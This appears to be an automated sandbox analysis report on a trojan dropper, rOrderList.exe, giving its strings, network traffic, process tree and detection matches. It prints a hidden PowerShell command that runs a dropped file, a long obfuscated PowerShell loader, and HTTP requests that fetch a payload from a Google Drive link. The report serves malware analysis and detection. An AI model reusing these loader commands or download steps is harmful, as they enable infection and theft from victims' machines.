            Source: rOrderList.exe, 00000000.00000002.797609582.0000000002A90000.00000004.00000020.00020000.00000000.sdmp, rOrderList.exe, 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmp, prldap60.dll.0.dr, nsv3D6A.tmp.0.drString found in binary or memory: http://ocsp.digicert.com0N
            Source: rOrderList.exe, 00000000.00000002.797609582.0000000002A90000.00000004.00000020.00020000.00000000.sdmp, rOrderList.exe, 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmp, prldap60.dll.0.dr, nsv3D6A.tmp.0.drString found in binary or memory: http://ocsp.digicert.com0O
            Source: rOrderList.exeString found in binary or memory: http://repository.certum.pl/ctnca.cer09
            Source: rOrderList.exeString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
            Source: rOrderList.exeString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
            Source: powershell.exe, 00000004.00000002.1333711867.00000000049C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: rOrderList.exeString found in binary or memory: http://subca.ocsp-certum.com01
            Source: rOrderList.exeString found in binary or memory: http://subca.ocsp-certum.com02
            Source: rOrderList.exeString found in binary or memory: http://subca.ocsp-certum.com05
            Source: rOrderList.exeString found in binary or memory: http://www.certum.pl/CPS0
            Source: rOrderList.exe, 00000000.00000002.797609582.0000000002A90000.00000004.00000020.00020000.00000000.sdmp, rOrderList.exe, 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmp, prldap60.dll.0.dr, nsv3D6A.tmp.0.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: powershell.exe, 00000004.00000002.1333711867.00000000049C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB)r
            Source: ieinstal.exe, 00000006.00000003.1292453013.0000000007583000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
            Source: ieinstal.exe, 00000006.00000002.5938763780.000000000757F000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.3487806711.000000000755B000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.3487806711.000000000757F000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.1297996409.0000000007582000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000002.5938763780.000000000755B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0c-18-docs.googleusercontent.com/
            Source: ieinstal.exe, 00000006.00000003.3487806711.000000000755B000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000002.5938763780.000000000755B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0c-18-docs.googleusercontent.com/9
            Source: ieinstal.exe, 00000006.00000003.1292453013.0000000007583000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000002.5938763780.000000000757F000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.3487806711.000000000755B000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.3487806711.000000000757F000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.1297996409.0000000007582000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000002.5938763780.000000000755B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0c-18-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/u240eld0
            Source: ieinstal.exe, 00000006.00000002.5938763780.000000000757F000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.3487806711.000000000757F000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.1297996409.0000000007582000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0c-18-docs.googleusercontent.com/tography
            Source: ieinstal.exe, 00000006.00000002.5938397389.0000000007528000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.3486333941.0000000007527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: ieinstal.exe, 00000006.00000002.5938397389.0000000007528000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.3486333941.0000000007527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/F
            Source: ieinstal.exe, 00000006.00000002.5938000428.00000000074F7000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000002.5946753314.00000000229A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1KTmOxGhXIq2ElcP80VIZKg-V2XXDylRv
            Source: ieinstal.exe, 00000006.00000002.5938000428.00000000074F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1KTmOxGhXIq2ElcP80VIZKg-V2XXDylRv8Y
            Source: rOrderList.exe, 00000000.00000002.797609582.0000000002A90000.00000004.00000020.00020000.00000000.sdmp, rOrderList.exe, 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmp, prldap60.dll.0.dr, nsv3D6A.tmp.0.drString found in binary or memory: https://mozilla.org0
            Source: rOrderList.exe, 00000000.00000002.797609582.0000000002A90000.00000004.00000020.00020000.00000000.sdmp, rOrderList.exe, 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmp, prldap60.dll.0.dr, nsv3D6A.tmp.0.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1KTmOxGhXIq2ElcP80VIZKg-V2XXDylRv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/u240eld0p0tadod6hiuj3dfkeglaump9/1682520225000/10652726447177276017/*/1KTmOxGhXIq2ElcP80VIZKg-V2XXDylRv?e=download&uuid=ced9cc8a-b62a-40b4-be8c-f2049575c42e HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-18-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.11.20:49796 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.11.20:49797 version: TLS 1.2
            Source: C:\Users\user\Desktop\rOrderList.exeCode function: 0_2_004056E3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056E3

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 00000006.00000002.5938763780.000000000757F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.3487806711.000000000757F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.3488569083.000000000757F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.3486333941.000000000757F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 5796, type: MEMORYSTR

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: rOrderList.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 23329
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 23329Jump to behavior
            Source: rOrderList.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\rOrderList.exeCode function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004035D8
            Source: C:\Users\user\Desktop\rOrderList.exeCode function: 0_2_00406C5B0_2_00406C5B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0457A6304_2_0457A630
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0457A6214_2_0457A621
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0457EAC04_2_0457EAC0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0457EAB04_2_0457EAB0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07DE5A504_2_07DE5A50
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07DEB5584_2_07DEB558
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07DE63204_2_07DE6320
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07FA4C484_2_07FA4C48
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07FA23584_2_07FA2358
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07FA23504_2_07FA2350
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_080300264_2_08030026
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_080300404_2_08030040
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_080352B14_2_080352B1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_080352C04_2_080352C0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_087258684_2_08725868
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_087200404_2_08720040
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_087261B84_2_087261B8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_087212104_2_08721210
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08721C814_2_08721C81
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08722FEA4_2_08722FEA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0872E2D84_2_0872E2D8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0872D3C84_2_0872D3C8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08726CE04_2_08726CE0
            Source: rOrderList.exe, 00000000.00000002.797609582.0000000002A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprldap60.dll8 vs rOrderList.exe
            Source: rOrderList.exe, 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameprldap60.dll8 vs rOrderList.exe
            Source: C:\Users\user\Desktop\rOrderList.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: edgegdi.dllJump to behavior
            Source: rOrderList.exeStatic PE information: invalid certificate
            Source: rOrderList.exeVirustotal: Detection: 21%
            Source: C:\Users\user\Desktop\rOrderList.exeFile read: C:\Users\user\Desktop\rOrderList.exeJump to behavior
            Source: rOrderList.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\rOrderList.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\rOrderList.exe C:\Users\user\Desktop\rOrderList.exe
            Source: C:\Users\user\Desktop\rOrderList.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $a = Get-Content 'C:\Users\user\AppData\Local\Interpartesforhold\Strengelege\Smalsidernes\Eurindic.zoo' ; powershell.exe "$a"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Soldierproof iscremernes Vagthundes Taktmssigt Embroaden Secluded #>$Bisonerne = """ F;BaF juFon BcFetEsireoScn T HWLyaBefOvfLoeTad B8La Un{ V N S Al SvpAfaFar laSwmBa( P[UdSsctForCoi Pn Ag S]Fo`$ UL RuTrvTjaMar Utsw) K;Ca Di`$BaUPenCrdBieUnc NkBleDid N4 L C=Ba Ls`$JeLVeuAuv Ba SrAnt I.SaLBoeEnntngGrtHjhAp;To S fr su U`$FrDApoMelTilVaaBlrMal Me uaHaf H Pl=No BaNHee Swtv- COScbBrjUnevacUntJu Chb Hyaat SeQu[Ud] T R( L`$ HU Nnnod HeDecMik LeFadYa4Mo Ph/Se Un2Tr)Fn;Fo H Gr Un TFHaoEnrNi( B`$ RPAtoLulPayInp Eh Ro MnKii Ac sa BlFilGnyRe=Sk0Ak; B fr`$FaPWao RlIryDopElhPuo On Si Wc LaTelUll Fy D R-KrlKltFr Ge`$EnULinIdd JeLecEmkHveFodsa4Lv; T Ch`$VePSjoOmlGeyAlp AhSeoUfnUeiSccFla TlCalPaypr+ R=Pi2An) M{ F or Ko O O Re C Pr F`$ SD Oo KlCal Sa PrHil SeUdaGlfva[ E`$SuP LoOpl syTop Ph Eo Mn uiSocSoaRalUdl myau/ I2Be]Al Ma= H Ma[Orc To rnIrvHoeBlr CtSp]be:Wa:BeT Go IBCoy PtFoe g(Pn`$DeLBiu Pv Ba fr PtAt. nS MuBibTys Pt FrGli BnAlgNu( T`$TuPSooLglOpyTopAnhRuoHjneji Bc LaHalRalBiy F,Sy Ac2In) D,Fu Dr1Co6He)Ru;No R ga`$GeDCooAcl NlAta IrPrlReeFaa Ff F[ I`$GoPBioRolUnyDupLih AoKnnSti GcErastlMul Ay E/Fy2 U]Gy B=He Ma( S`$ MDUdoSkl TlPuaUdr Bl Re Da Cf O[Tu`$OmPUgoGll TyCopVohToobrnBliMocHaaSulBul QyEx/ B2 L]El Ph- SbFrx FoscrAl Sa1tr7 C2Ca)Ov; V mi Tu Ed I} O Ta[ MS Mt SrCoi Rn RgPr]An[ cS SyBisTatDueNimTl. DTToeNoxAutUr. SEsenUdcsto MdVuiRanRygsl] F: C:DoABeSAlC VIseIAp.PoGDee TtblS st Br Si Sn Sg A( D`$ BDAkoSal IlGeaFurSulPrePoaTufRe)Ch;ek}Re`$IrDRerSti Mf StCas Fh BePrr PrFoe SnGe0Op=luWsaaTof LfUne PdFo8Cl Ne' FFFoFAeDSt5ToD OFAmDBu8 JCVe9 eC S1Ta8Fr2WhCFr8CoCLo0 OCKr0tr' S; M`$ScDCarhaimafSktSjs Mh DeTerFrr PeSnn G1Ud= UWHoa Df RfFoepsdRu8No C'HdE A1 HC u5StC SFUnD BE FCAu3 WDPlFChC E3 BC PA TD W8 F8 S2 SFCaBMaC V5 SCMo2Al9FaFBr9 CEUn8 S2UnFQu9 SC Q2AfD AFBiCnaDReCReACaC J9FoEMe2 BC ND TD S8 ICCi5SuDSeAPhCFa9 MEDe1 DCps9SaD A8 UCUn4PrC M3kuC R8InDLiF A' N;Al`$ OD RrArionf AtMjs Uh DeRerSur GePon A2 H=ShWDaaDef FfEde WdSk8Ca De' DE OBOmCCo9BrD P8BiF GCKaD TEReCDo3 BCDrFStECoDLuCPe8 PCBu8 RDDiE MC S9SkDfrFKoD IF B'Re; B`$ fD SrMeiFlf Bt Gs Uh Me SrSkr MeKinSa3 P=DeWOva MfTof IeMid k8 B N'ApFNaFOmDGa5GeD RFFlDWa8 GCCo9HjCbe1 P8 i2ClFTiEkrD H9DoCMu2 RDSa8 CC e5FaCSl1 IC g9Mi8Se2PhEAr5 SC E2AnDSp8IdCBi9SuDGuE LC K3KaDLeCpaFKoF BCGu9 BDouE PDBvAboCNu5AcC UFScC H9InDNoF L8Sh2UnESk4SvC SD PC P2 PCSy8SyCPo0 VCIt9 AF VE CCGa9 ICPaAOv'Ua;Du`$ BD frafisnfKrtDesKrhAfe SrsvrsoeMan D4Da=OtW IaAifSof seHadBe8Ci N'GeD fF ADEf8reDMcEFoCge5 TCSk2DaCDyB B'Un; O`$huDCorStiGef Et Ms HhPse OrRerSre Pn M5Sa=UdW BaOtf Pfgae JdBo8In Fr'SnE SBInCIn9saDCa8ReEFr1 PC P3InCDi8 BD s9AbCTo0 TCMr9ShEkn4NeCGrDPuCPy2ReCMi8LaCli0OnCRa9Pr' S; V`$VuD SrTriThf KtWos Th Oe SrclrBue MnFa6Mo=foWBjaSafQuf fehad U8at Li' SF SEEpF K8kvF sFofD ACpeCSe9LaC pFLvCka5ErC OD fCou0 HERh2TrC cDdiCAp1 CC K9 G8Sk0Ud8AiCScEDa4 GC D5OvCEn8NaCde9 BEstEUnD B5FlFClF sC N5 NCTiBOr
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
            Source: C:\Users\user\Desktop\rOrderList.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $a = Get-Content 'C:\Users\user\AppData\Local\Interpartesforhold\Strengelege\Smalsidernes\Eurindic.zoo' ; powershell.exe "$a"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Soldierproof iscremernes Vagthundes Taktmssigt Embroaden Secluded #>$Bisonerne = """ F;BaF juFon BcFetEsireoScn T HWLyaBefOvfLoeTad B8La Un{ V N S Al SvpAfaFar laSwmBa( P[UdSsctForCoi Pn Ag S]Fo`$ UL RuTrvTjaMar Utsw) K;Ca Di`$BaUPenCrdBieUnc NkBleDid N4 L C=Ba Ls`$JeLVeuAuv Ba SrAnt I.SaLBoeEnntngGrtHjhAp;To S fr su U`$FrDApoMelTilVaaBlrMal Me uaHaf H Pl=No BaNHee Swtv- COScbBrjUnevacUntJu Chb Hyaat SeQu[Ud] T R( L`$ HU Nnnod HeDecMik LeFadYa4Mo Ph/Se Un2Tr)Fn;Fo H Gr Un TFHaoEnrNi( B`$ RPAtoLulPayInp Eh Ro MnKii Ac sa BlFilGnyRe=Sk0Ak; B fr`$FaPWao RlIryDopElhPuo On Si Wc LaTelUll Fy D R-KrlKltFr Ge`$EnULinIdd JeLecEmkHveFodsa4Lv; T Ch`$VePSjoOmlGeyAlp AhSeoUfnUeiSccFla TlCalPaypr+ R=Pi2An) M{ F or Ko O O Re C Pr F`$ SD Oo KlCal Sa PrHil SeUdaGlfva[ E`$SuP LoOpl syTop Ph Eo Mn uiSocSoaRalUdl myau/ I2Be]Al Ma= H Ma[Orc To rnIrvHoeBlr CtSp]be:Wa:BeT Go IBCoy PtFoe g(Pn`$DeLBiu Pv Ba fr PtAt. nS MuBibTys Pt FrGli BnAlgNu( T`$TuPSooLglOpyTopAnhRuoHjneji Bc LaHalRalBiy F,Sy Ac2In) D,Fu Dr1Co6He)Ru;No R ga`$GeDCooAcl NlAta IrPrlReeFaa Ff F[ I`$GoPBioRolUnyDupLih AoKnnSti GcErastlMul Ay E/Fy2 U]Gy B=He Ma( S`$ MDUdoSkl TlPuaUdr Bl Re Da Cf O[Tu`$OmPUgoGll TyCopVohToobrnBliMocHaaSulBul QyEx/ B2 L]El Ph- SbFrx FoscrAl Sa1tr7 C2Ca)Ov; V mi Tu Ed I} O Ta[ MS Mt SrCoi Rn RgPr]An[ cS SyBisTatDueNimTl. DTToeNoxAutUr. SEsenUdcsto MdVuiRanRygsl] F: C:DoABeSAlC VIseIAp.PoGDee TtblS st Br Si Sn Sg A( D`$ BDAkoSal IlGeaFurSulPrePoaTufRe)Ch;ek}Re`$IrDRerSti Mf StCas Fh BePrr PrFoe SnGe0Op=luWsaaTof LfUne PdFo8Cl Ne' FFFoFAeDSt5ToD OFAmDBu8 JCVe9 eC S1Ta8Fr2WhCFr8CoCLo0 OCKr0tr' S; M`$ScDCarhaimafSktSjs Mh DeTerFrr PeSnn G1Ud= UWHoa Df RfFoepsdRu8No C'HdE A1 HC u5StC SFUnD BE FCAu3 WDPlFChC E3 BC PA TD W8 F8 S2 SFCaBMaC V5 SCMo2Al9FaFBr9 CEUn8 S2UnFQu9 SC Q2AfD AFBiCnaDReCReACaC J9FoEMe2 BC ND TD S8 ICCi5SuDSeAPhCFa9 MEDe1 DCps9SaD A8 UCUn4PrC M3kuC R8InDLiF A' N;Al`$ OD RrArionf AtMjs Uh DeRerSur GePon A2 H=ShWDaaDef FfEde WdSk8Ca De' DE OBOmCCo9BrD P8BiF GCKaD TEReCDo3 BCDrFStECoDLuCPe8 PCBu8 RDDiE MC S9SkDfrFKoD IF B'Re; B`$ fD SrMeiFlf Bt Gs Uh Me SrSkr MeKinSa3 P=DeWOva MfTof IeMid k8 B N'ApFNaFOmDGa5GeD RFFlDWa8 GCCo9HjCbe1 P8 i2ClFTiEkrD H9DoCMu2 RDSa8 CC e5FaCSl1 IC g9Mi8Se2PhEAr5 SC E2AnDSp8IdCBi9SuDGuE LC K3KaDLeCpaFKoF BCGu9 BDouE PDBvAboCNu5AcC UFScC H9InDNoF L8Sh2UnESk4SvC SD PC P2 PCSy8SyCPo0 VCIt9 AF VE CCGa9 ICPaAOv'Ua;Du`$ BD frafisnfKrtDesKrhAfe SrsvrsoeMan D4Da=OtW IaAifSof seHadBe8Ci N'GeD fF ADEf8reDMcEFoCge5 TCSk2DaCDyB B'Un; O`$huDCorStiGef Et Ms HhPse OrRerSre Pn M5Sa=UdW BaOtf Pfgae JdBo8In Fr'SnE SBInCIn9saDCa8ReEFr1 PC P3InCDi8 BD s9AbCTo0 TCMr9ShEkn4NeCGrDPuCPy2ReCMi8LaCli0OnCRa9Pr' S; V`$VuD SrTriThf KtWos Th Oe SrclrBue MnFa6Mo=foWBjaSafQuf fehad U8at Li' SF SEEpF K8kvF sFofD ACpeCSe9LaC pFLvCka5ErC OD fCou0 HERh2TrC cDdiCAp1 CC K9 G8Sk0Ud8AiCScEDa4 GC D5OvCEn8NaCde9 BEstEUnD B5FlFClF sC N5 NCTiBOrJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
            Source: C:\Users\user\Desktop\rOrderList.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\rOrderList.exeCode function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004035D8
            Source: C:\Users\user\Desktop\rOrderList.exeFile created: C:\Users\user\AppData\Local\InterpartesforholdJump to behavior
            Source: C:\Users\user\Desktop\rOrderList.exeFile created: C:\Users\user\AppData\Local\Temp\nsv3D69.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@10/15@3/4
            Source: C:\Users\user\Desktop\rOrderList.exeCode function: 0_2_004021A2 CoCreateInstance,0_2_004021A2
            Source: C:\Users\user\Desktop\rOrderList.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\rOrderList.exeCode function: 0_2_00404983 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404983
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4264:304:WilStaging_02
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-ADJC7K
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4264:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\Desktop\rOrderList.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaltedesJump to behavior
            Source: rOrderList.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: prldap60.pdb source: rOrderList.exe, 00000000.00000002.797609582.0000000002A90000.00000004.00000020.00020000.00000000.sdmp, rOrderList.exe, 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmp, prldap60.dll.0.dr, nsv3D6A.tmp.0.dr

            Data Obfuscation

            barindex
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 400, type: MEMORYSTR
            Source: C:\Users\user\Desktop\rOrderList.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $a = Get-Content 'C:\Users\user\AppData\Local\Interpartesforhold\Strengelege\Smalsidernes\Eurindic.zoo' ; powershell.exe "$a"
            Source: C:\Users\user\Desktop\rOrderList.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $a = Get-Content 'C:\Users\user\AppData\Local\Interpartesforhold\Strengelege\Smalsidernes\Eurindic.zoo' ; powershell.exe "$a"Jump to behavior
            Source: C:\Users\user\Desktop\rOrderList.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $a = Get-Content 'C:\Users\user\AppData\Local\Interpartesforhold\Strengelege\Smalsidernes\Eurindic.zoo' ; powershell.exe "$a"
